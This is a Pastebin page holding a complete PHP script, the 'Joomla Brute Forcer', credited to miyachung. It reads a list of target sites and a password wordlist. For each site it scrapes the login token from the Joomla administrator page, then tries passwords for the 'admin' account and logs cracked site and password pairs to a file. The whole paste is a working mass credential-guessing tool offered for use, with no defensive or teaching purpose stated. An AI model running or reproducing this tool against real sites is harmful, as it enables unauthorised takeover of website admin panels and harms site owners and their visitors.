Pastebin launched a little side project called VERYVIRAL.com, check it out ;-) Want more features on Pastebin? Sign Up, it's FREE!

Panel Brute Force Joomla

By: YeiZeta on Oct 2nd, 2012  |  syntax: None  |  size: 3.74 KB  |  views: 547  |  expires: Never
download  |  raw  |  embed  |  report abuse  |  print
Text below is selected. Please press Ctrl+C to copy to your clipboard. (⌘+C on Mac)
  1. <?php
  2. set_time_limit(0);
  3. /*
  4. *     Joomla Brute Forcer
  5. *     Coded by miyachung
  6. *    miyachung@hotmail.com
  7. *     Janissaries.Org
  8. *     Special Thanks burtay
  9. *    Usage-> php Bruter.php SITELIST PASSWORDS
  10. *    Example-> php Bruter.php SITES.txt PASSWORDS.txt
  11. */
  12.  
  13.  
  14. class jom
  15. {
  16.  
  17.     public  $sites;
  18.     public  $wordlist;
  19.     private $user      = "admin";
  20.     private $regex       = "/([0-9a-f]{32})/si";
  21.     private $timeout     = 7;
  22.     private $cookie_file  = "cookie.jani";
  23.     private $log_file    = "cracks.txt";
  24.  
  25.     private function save_File($content)
  26.   {
  27.     $fp = fopen($this->log_file,'ab');
  28.     fwrite($fp,$content);
  29.     fclose($fp);
  30.     if($fp)
  31.     {
  32.       return true;
  33.     }
  34.     else
  35.     {
  36.       return false;
  37.     }
  38.   }
  39.   private function get_Hash($site)
  40.   {
  41.     $curl = curl_init();
  42.     curl_setopt($curl,CURLOPT_RETURNTRANSFER,TRUE);
  43.     curl_setopt($curl,CURLOPT_URL,$site."/administrator/index.php");
  44.     curl_setopt($curl,CURLOPT_COOKIEJAR,$this->cookie_file);
  45.     curl_setopt($curl,CURLOPT_TIMEOUT,$this->timeout);
  46.     $play = curl_exec($curl);
  47.     curl_close($curl);
  48.     if(preg_match('#value="com_login"#si',$play))
  49.     {
  50.       preg_match($this->regex,$play,$hash);
  51.       return $hash[1];
  52.     }
  53.     else
  54.     {
  55.       echo "[-]Hash not found,passing site\n";
  56.       return false;
  57.     }
  58.   }
  59.   private function tryPassword($site,$password,$hash)
  60.   {
  61.     $curl = curl_init();
  62.     curl_setopt($curl,CURLOPT_RETURNTRANSFER,TRUE);
  63.     curl_setopt($curl,CURLOPT_POST,TRUE);
  64.     curl_setopt($curl,CURLOPT_FOLLOWLOCATION,TRUE);
  65.     curl_setopt($curl,CURLOPT_URL,$site."/administrator/index.php");
  66.     curl_setopt($curl,CURLOPT_COOKIEFILE,$this->cookie_file);
  67.     curl_setopt($curl,CURLOPT_TIMEOUT,$this->timeout);
  68.     curl_setopt($curl,CURLOPT_POSTFIELDS,"username=".$this->user."&passwd=".$password."&lang=&option=com_login&task=login&".$hash."=1");
  69.     $play = curl_exec($curl);
  70.     curl_close($curl);
  71.     return $play;
  72.   }
  73.   public function bruter()
  74.   {
  75.     $sites = explode("\n",file_get_contents($this->sites));
  76.      
  77.     foreach($sites as $site)
  78.     {
  79.       if(!preg_match('#http#si',$site)) $site = "http://".$site;
  80.       $site  =  trim($site);
  81.       echo "\n[+]$site\n";
  82.       $hash   = $this->get_Hash($site);
  83.       if(!$hash){continue;}
  84.       echo "[+]$hash\n";
  85.      
  86.       $wordlist = explode("\n",file_get_contents($this->wordlist));
  87.       foreach($wordlist as $password)
  88.       {
  89.       $try  =  $this->tryPassword($site,trim($password),$hash);
  90.       if(preg_match("/com_config/si",$try))
  91.       {
  92.         echo "\n\t[*]Password cracked-> ".$password."\n";
  93.         echo "\t[*]Saved to the log file\n";
  94.         $this->save_File("$site|$password\r\n");
  95.         break;
  96.       }
  97.      
  98.       }
  99.     }
  100.   }
  101. }
  102.  
  103. if(!$argv[1] || !$argv[2])
  104. {
  105.   echo "################################################\n";
  106.   echo "\t\tJoomla Brute Forcer\n";
  107.   echo "\t\tCoded By miyachung\n";
  108.   echo "\t\tJanissaries.Org\n";  
  109.   echo "################################################\n";
  110.   echo "\n[-]Missing arguments\n";
  111.   exit;
  112. }
  113. elseif(!file_exists($argv[1]) OR !file_exists($argv[2]))
  114. {
  115.   echo "################################################\n";
  116.   echo "\t\tJoomla Brute Forcer\n";
  117.   echo "\t\tCoded By miyachung\n";
  118.   echo "\t\tJanissaries.Org\n";  
  119.   echo "################################################\n";
  120.   echo "\n[-]File not found\n";
  121.   exit;
  122. }
  123. else
  124. {
  125.   echo "################################################\n";
  126.   echo "\t\tJoomla Brute Forcer\n";
  127.   echo "\t\tCoded By miyachung\n";
  128.   echo "\t\tJanissaries.Org\n";  
  129.   echo "################################################\n";
  130.  
  131.   $jom       = new jom;
  132.   $jom->sites   = $argv[1];
  133.   $jom->wordlist   = $argv[2];
  134.   $jom->bruter();
  135. }
  136.  
  137. ?>